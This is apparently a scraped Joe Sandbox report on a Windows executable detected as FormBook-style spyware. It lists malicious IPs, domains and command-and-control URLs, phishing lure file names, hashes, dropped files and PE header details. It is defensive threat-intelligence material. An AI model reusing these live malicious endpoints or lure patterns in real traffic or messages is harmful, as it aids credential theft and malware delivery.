                                                                                                                                                              https://gemini.google.com/app?q=choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown

                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                Public IPs

                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                162.0.238.43
                                                                                                                                                                		www.allpop.xyzCanada
                                                                                                                                                                		22612NAMECHEAP-NETUStrue
                                                                                                                                                                13.248.169.48
                                                                                                                                                                		www.firstcry.shopUnited States
                                                                                                                                                                		16509AMAZON-02UStrue
                                                                                                                                                                103.255.237.233
                                                                                                                                                                		www.languyenthuyduyen.xyzViet Nam
                                                                                                                                                                		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                                                                                                65.21.196.90
                                                                                                                                                                		030002304.xyzUnited States
                                                                                                                                                                		199592CP-ASDEtrue
                                                                                                                                                                45.56.219.238
                                                                                                                                                                		technew.shopCanada
                                                                                                                                                                		13768COGECO-PEER1CAtrue
                                                                                                                                                                199.59.243.227
                                                                                                                                                                		www.ntn.solarUnited States
                                                                                                                                                                		395082BODIS-NJUStrue
                                                                                                                                                                23.227.38.74
                                                                                                                                                                		shops.myshopify.comCanada
                                                                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                                                                84.32.84.32
                                                                                                                                                                		thepeatear.onlineLithuania
                                                                                                                                                                		33922NTT-LT-ASLTtrue
                                                                                                                                                                85.159.66.93
                                                                                                                                                                		natroredirect.natrocdn.comTurkey
                                                                                                                                                                		34619CIZGITRtrue
                                                                                                                                                                3.33.130.190
                                                                                                                                                                		mybartendinglife.clubUnited States
                                                                                                                                                                		8987AMAZONEXPANSIONGBtrue
                                                                                                                                                                54.67.42.145
                                                                                                                                                                		www.kx507981.shopUnited States
                                                                                                                                                                		16509AMAZON-02UStrue
                                                                                                                                                                104.21.77.69
                                                                                                                                                                		www.bayarcepat19.clickUnited States
                                                                                                                                                                		13335CLOUDFLARENETUStrue

                                                                                                                                                                General Information

                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                Analysis ID:1529811
                                                                                                                                                                Start date and time:2024-10-09 12:56:11 +02:00
                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 16m 52s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:full
                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                                Run name:Suspected Instruction Hammering
                                                                                                                                                                Number of analysed new started processes analysed:7
                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:2
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Sample name:8EhMjL3yNF.exe
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@7/2@18/12
                                                                                                                                                                EGA Information:
                                                                                                                                                                • Successful, ratio: 66.7%
                                                                                                                                                                HCA Information:
                                                                                                                                                                • Successful, ratio: 92%
                                                                                                                                                                • Number of executed functions: 45
                                                                                                                                                                • Number of non-executed functions: 288
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                                                                Warnings

                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe
                                                                                                                                                                • Excluded domains from analysis (whitelisted): self.events.data.microsoft.com, ctldl.windowsupdate.com, nexusrules.officeapps.live.com
                                                                                                                                                                • Execution Graph export aborted for target SjhnWvlTMw.exe, PID 6828 because it is empty
                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                • VT rate limit hit for: 8EhMjL3yNF.exe

                                                                                                                                                                Simulations

                                                                                                                                                                Behavior and APIs

                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                07:02:01API Interceptor20308281x Sleep call for process: choice.exe modified

                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                IPs

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                162.0.238.43RQ#071024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.tomtox.top/3nd4/?O47=wX8jjEADFIUNbB1fuwn27lCA5Ee2RiJ4qVOVM3qHbtn5VxkeI5MaAkn7o3WZs+Yr7x4eULr6m9MYlnr0WXfs/nrrtX3ZRdR1xibdPs5ToUAPuDeUSg==&LT=aZbPzzPX3H
                                                                                                                                                                Quote #260924.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.tomtox.top/3nd4/
                                                                                                                                                                Quote #270924.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.tomtox.top/3nd4/
                                                                                                                                                                Product Data Specifications_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.mandemj.top/to69/?Z0=jnxbIh9toY3Lk084faTvVBMEFxwUktgIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXB9gkhdqEj3u6wGNYEX9l8USgN38burlDvemyCHtOx57idtfraeuBs8os&fRr0=tfAptZ
                                                                                                                                                                PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.storestone.xyz/pd4o/
                                                                                                                                                                QlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.mandemj.top/to69/?vlJ0J=jnxbIh9toY3Lk084faTvVBMEFxwUktgIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXB6xmvPC7jVOY3WNYEUB78n7uOkwblrlFm/iycyJOk57iLJ//IZc=&HDJP=Pnl8G6jPyrn
                                                                                                                                                                BL Draft-Invoice-Packing list-Shipping Document.pif.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.mechecker.life/b6h1/
                                                                                                                                                                2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.mandemj.top/to69/?mnShvP=jnxbIh9toY3Lk087BKTBUwMLIQNntOIIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXTMZnvKu4jSfDtGBlDX578zWDJUwflrx6suU=&Cbj=nB9LWdWpMT7tUBt
                                                                                                                                                                SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.mandemj.top/to69/?VzA=dz5HvTSP4ZdlFHDP&RD4=jnxbIh9toY3Lk087BKTBUwMLIQNntOIIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXTMZnvKu4jSfDtGBlDX578zWDJUwflrx6suU=
                                                                                                                                                                x.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.withad.xyz/r0nv/
                                                                                                                                                                13.248.169.48BAJFMONYm2.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.jacquesjanine.online/ey4t/
                                                                                                                                                                fJD7ivEnzm.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.dyme.tech/h7lb/
                                                                                                                                                                jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.dyme.tech/h7lb/
                                                                                                                                                                Pending invoices.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.extrem.tech/lwlk/
                                                                                                                                                                Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.firstcry.shop/e4x0/
                                                                                                                                                                presupuesto urgente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                • www.sleephygienist.org/9ned/
                                                                                                                                                                -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.invicta.world/tcs6/
                                                                                                                                                                payment copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.firstcry.shop/e4x0/
                                                                                                                                                                Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.invicta.world/aohi/
                                                                                                                                                                shipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • www.mynotebook.shop/3q2o/

                                                                                                                                                                Domains

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                www.languyenthuyduyen.xyzRN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 103.255.237.233
                                                                                                                                                                HBLAWBP.LISTCOC & INV.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 103.255.237.233
                                                                                                                                                                NEW ORDERS scan_29012019.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 103.255.237.233
                                                                                                                                                                www.firstcry.shopArrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 13.248.169.48
                                                                                                                                                                payment copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 13.248.169.48
                                                                                                                                                                shops.myshopify.comArrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 23.227.38.74
                                                                                                                                                                payment copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 23.227.38.74
                                                                                                                                                                ORDER ENQUIRY.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 23.227.38.74
                                                                                                                                                                https://ebookkeepers.com.pk/Get hashmaliciousUnknownBrowse
                                                                                                                                                                • 23.227.38.74
                                                                                                                                                                http://fix-bill.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                • 23.227.38.74
                                                                                                                                                                H9DsG7WKGt.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 23.227.38.74
                                                                                                                                                                https://cancelar-plan-pr0teccion1.w3spaces.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                • 23.227.38.74
                                                                                                                                                                ORDER_1105-19-24-3537.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 23.227.38.74
                                                                                                                                                                Specification and Quantity Pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 23.227.38.74
                                                                                                                                                                r8ykXfy52F9CXd5d.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 23.227.38.74

                                                                                                                                                                ASNs

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                CP-ASDEBILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 65.21.196.90
                                                                                                                                                                https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFnDa0TAMLVO9WtBTyYEZqZA-3DPrnv_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOmYNN4Eos0I-2F5FhDJBI4w4qadztSYeu4ugOMJrD5ZJ3NK5HbR-2B5js4EjZpFmlZJIJ2eepX0b1t3SsV5gyIJGc7CJjeC8X5Wxzv49-2FqOYJzl5qBXpr-2BWwAW7G6cWDOqZN4YK73LjV4xBBNvL9fcHX0SM3SHQjbhXBuKD0dh5WqiuRgt8l7OsZEvxy8UkJaur7KIBjJyVTij7zCSJnYd6mjsUFQl8fAjX9eSOEGKjy2XWh8GHa2xi9VgTVCxGMcn7gM-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 65.21.29.43
                                                                                                                                                                BAJFMONYm2.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 65.21.196.90
                                                                                                                                                                5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 65.21.196.90
                                                                                                                                                                RQ#071024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 65.21.196.90
                                                                                                                                                                http://dmed-industries.comGet hashmaliciousHtmlDropperBrowse
                                                                                                                                                                • 65.21.29.43
                                                                                                                                                                Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 65.21.196.90
                                                                                                                                                                https://jumatan.sudaha.biz.id/4F741t%23XjCw%5BYg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                • 65.21.235.194
                                                                                                                                                                rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                • 65.21.196.90
                                                                                                                                                                https://www.elightsailorsbank.uksfholdings.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                • 65.21.85.206
                                                                                                                                                                VNPT-AS-VNVNPTCorpVNna.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 14.172.101.50
                                                                                                                                                                hPIF0APgJk.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 113.166.174.161
                                                                                                                                                                Dekont.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 203.161.41.254
                                                                                                                                                                T9W7MCS2HI.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 203.161.43.245
                                                                                                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 14.239.124.27
                                                                                                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 123.18.105.224
                                                                                                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 123.30.215.227
                                                                                                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 123.18.32.94
                                                                                                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 14.237.37.78
                                                                                                                                                                na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                • 14.185.207.165
                                                                                                                                                                AMAZON-02USfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                • 52.222.236.120
                                                                                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                • 52.222.236.23
                                                                                                                                                                BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 52.13.151.179
                                                                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 52.222.236.23
                                                                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 52.222.236.80
                                                                                                                                                                FW Document shared with you Remote Work Policy Update.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                • 52.16.10.74
                                                                                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                • 52.222.236.120
                                                                                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                • 52.222.236.23
                                                                                                                                                                https://logverification.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                • 44.240.81.212
                                                                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 52.222.236.120
                                                                                                                                                                NAMECHEAP-NETUSlPX6PixV4t.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 199.192.21.169
                                                                                                                                                                LegionLoader (13).msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 162.255.119.168
                                                                                                                                                                LegionLoader (14).msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 162.255.119.168
                                                                                                                                                                LegionLoader (15).msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 162.255.119.168
                                                                                                                                                                LegionLoader (10).msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 162.255.119.168
                                                                                                                                                                LegionLoader (11).msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 162.255.119.168
                                                                                                                                                                LegionLoader (12).msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 162.255.119.168
                                                                                                                                                                LegionLoader (9).msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 162.255.119.168
                                                                                                                                                                LegionLoader (2).msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 162.255.119.168
                                                                                                                                                                LegionLoader.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 162.255.119.168

                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                No context

                                                                                                                                                                Dropped Files

                                                                                                                                                                No context

                                                                                                                                                                Created / dropped Files

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\if2y862l8

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 6, database pages 109, cookie 0x62, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):229376
                                                                                                                                                                Entropy (8bit):0.9085960794285802
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:HfKCsnNjzI63PG43lAfKIq9JvOeMZHIXI:HDsndzn/G43lAfKIq9JtmHIX
                                                                                                                                                                MD5:17091CB4BC9C6E80CA91C12E0BBA56F4
                                                                                                                                                                SHA1:ED7E485630B1245C7AE963FB02C899BF141DB578
                                                                                                                                                                SHA-256:551A6521FF9A83FDB18EFB95916A74A45600A427911FE4E1BD59A2795A1EF814
                                                                                                                                                                SHA-512:A5752E9BE8E233026C6378521127014EDD395F44AFB3C5F078300783792AEFEF1C6D08C4B63923DF9FD5AF7A1653F994677BCC40D9CF7636B26A6461F6172A4A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview:SQLite format 3......@ .......m...........b......................................................v............i........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\unjust

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\8EhMjL3yNF.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):286720
                                                                                                                                                                Entropy (8bit):7.991783389229631
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:6144:yFt4juKvfI8TmWSCIsGrz6s1QpuLR25brvZgPoOrFpnEiACU1kts:yTGVvDVLIsgzV1QpAR2hriIiV8ss
                                                                                                                                                                MD5:09639C48ED1148928224A5BD684B6C8D
                                                                                                                                                                SHA1:DECAEADB8252B5EBDD731E2C3D7CB54BAA6D82F8
                                                                                                                                                                SHA-256:27CA67F14E80FB3F18907988EAF364488F894D625EAAD871F3DF6289CFBA16E1
                                                                                                                                                                SHA-512:792F8552E5FC9E33734B98D97DA6FF9BCA75AC05716A4C43243329B18E782287C2CF55D70264D9CC8C1CC67495977089D002C35AABA23BC4E9A84B05AA77C30E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview:|..j.U027...Z......Q2...}V8...1MS8UU027Q1MS8UU027Q1MS8UU027Q.MS8[J.<7.8.r.T...c9X>sH':W@V<..2V;:D.U4.?&Vu<^.s.bm>W10.?:[.MS8UU02NP8.nX2..RP..-4.O...1V.I....RP.+...i5W.e8R%nX2.027Q1MS8..02{P0Ms...027Q1MS8.U23<P:MSvQU027Q1MS8.A027A1MSXQU02wQ1]S8UW021Q1MS8UU627Q1MS8U5427S1MS8UU22w.1MC8UE027Q!MS(UU027Q!MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1M}L0-D27Q..W8UE027.5MS(UU027Q1MS8UU02.Q1-S8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q1MS8UU027Q

                                                                                                                                                                Static File Info

                                                                                                                                                                General

                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Entropy (8bit):7.5265688883824255
                                                                                                                                                                TrID:
                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                File name:8EhMjL3yNF.exe
                                                                                                                                                                File size:1'336'099 bytes
                                                                                                                                                                MD5:adf7951566b1bb643b3fc555987cbddc
                                                                                                                                                                SHA1:29d6e8e48400e531e35b129781528dd3f10fc08b
                                                                                                                                                                SHA256:84ced43584331241219ef94bb7d214d96f1c5f4fdbc9adc0bb9d5fcd5cb0f27c
                                                                                                                                                                SHA512:33ec3005a66f22ce740a5b18d9f8cbce1c638ca1505d40a3b982722ac6973acd39a46978ffe6e03ea74267c0be705513bd635fcc9b0f0e077770a8605f288893
                                                                                                                                                                SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCkLD+t9x2FlenXm+sgt4xfPGCiox/qOfL7q6XgEy:7JZoQrbTFZY1iaCWxinW+sssnGCipOfq
                                                                                                                                                                TLSH:9B55F122B5D68076C2F327B19E7EF76A9A3D79360326D29723C42D315EA05412B39733
                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                                                                                                                                File Icon

                                                                                                                                                                Icon Hash:1733312925935517

                                                                                                                                                                Static PE Info

                                                                                                                                                                General

                                                                                                                                                                Entrypoint:0x4165c1
                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                Digitally signed:false
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                OS Version Major:5
                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                File Version Major:5
                                                                                                                                                                File Version Minor:0
                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                Instruction
                                                                                                                                                                call 00007FC9F48CFEEBh
                                                                                                                                                                jmp 00007FC9F48C6D5Eh
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                push ebp
                                                                                                                                                                mov ebp, esp
                                                                                                                                                                push edi
                                                                                                                                                                push esi
                                                                                                                                                                mov esi, dword ptr [ebp+0Ch]
                                                                                                                                                                mov ecx, dword ptr [ebp+10h]
                                                                                                                                                                mov edi, dword ptr [ebp+08h]
                                                                                                                                                                mov eax, ecx
                                                                                                                                                                mov edx, ecx
                                                                                                                                                                add eax, esi
                                                                                                                                                                cmp edi, esi
                                                                                                                                                                jbe 00007FC9F48C6EDAh
                                                                                                                                                                cmp edi, eax
                                                                                                                                                                jc 00007FC9F48C7076h
                                                                                                                                                                cmp ecx, 00000080h
                                                                                                                                                                jc 00007FC9F48C6EEEh
                                                                                                                                                                cmp dword ptr [004A9724h], 00000000h
                                                                                                                                                                je 00007FC9F48C6EE5h
                                                                                                                                                                push edi
                                                                                                                                                                push esi
                                                                                                                                                                and edi, 0Fh
                                                                                                                                                                and esi, 0Fh
                                                                                                                                                                cmp edi, esi
                                                                                                                                                                pop esi
                                                                                                                                                                pop edi
                                                                                                                                                                jne 00007FC9F48C6ED7h
                                                                                                                                                                jmp 00007FC9F48C72B2h
                                                                                                                                                                test edi, 00000003h
                                                                                                                                                                jne 00007FC9F48C6EE6h
                                                                                                                                                                shr ecx, 02h
                                                                                                                                                                and edx, 03h
                                                                                                                                                                cmp ecx, 08h
                                                                                                                                                                jc 00007FC9F48C6EFBh
                                                                                                                                                                rep movsd
                                                                                                                                                                jmp dword ptr [00416740h+edx*4]
                                                                                                                                                                mov eax, edi
                                                                                                                                                                mov edx, 00000003h
                                                                                                                                                                sub ecx, 04h
                                                                                                                                                                jc 00007FC9F48C6EDEh
                                                                                                                                                                and eax, 03h
                                                                                                                                                                add ecx, eax
                                                                                                                                                                jmp dword ptr [00416654h+eax*4]
                                                                                                                                                                jmp dword ptr [00416750h+ecx*4]
                                                                                                                                                                nop
                                                                                                                                                                jmp dword ptr [004166D4h+ecx*4]
                                                                                                                                                                nop
                                                                                                                                                                inc cx
                                                                                                                                                                add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                                                                                inc cx
                                                                                                                                                                add byte ptr [ebx], ah
                                                                                                                                                                ror dword ptr [edx-75F877FAh], 1
                                                                                                                                                                inc esi
                                                                                                                                                                add dword ptr [eax+468A0147h], ecx
                                                                                                                                                                add al, cl
                                                                                                                                                                jmp 00007FC9F6D3F6D7h
                                                                                                                                                                add esi, 03h
                                                                                                                                                                add edi, 03h
                                                                                                                                                                cmp ecx, 08h
                                                                                                                                                                jc 00007FC9F48C6E9Eh
                                                                                                                                                                rep movsd
                                                                                                                                                                jmp dword ptr [00000000h+edx*4]

                                                                                                                                                                Rich Headers

                                                                                                                                                                Programming Language:
                                                                                                                                                                • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                • [C++] VS2010 SP1 build 40219
                                                                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                • [ASM] VS2010 SP1 build 40219
                                                                                                                                                                • [RES] VS2010 SP1 build 40219
                                                                                                                                                                • [LNK] VS2010 SP1 build 40219

                                                                                                                                                                Data Directories

                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                Sections

                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
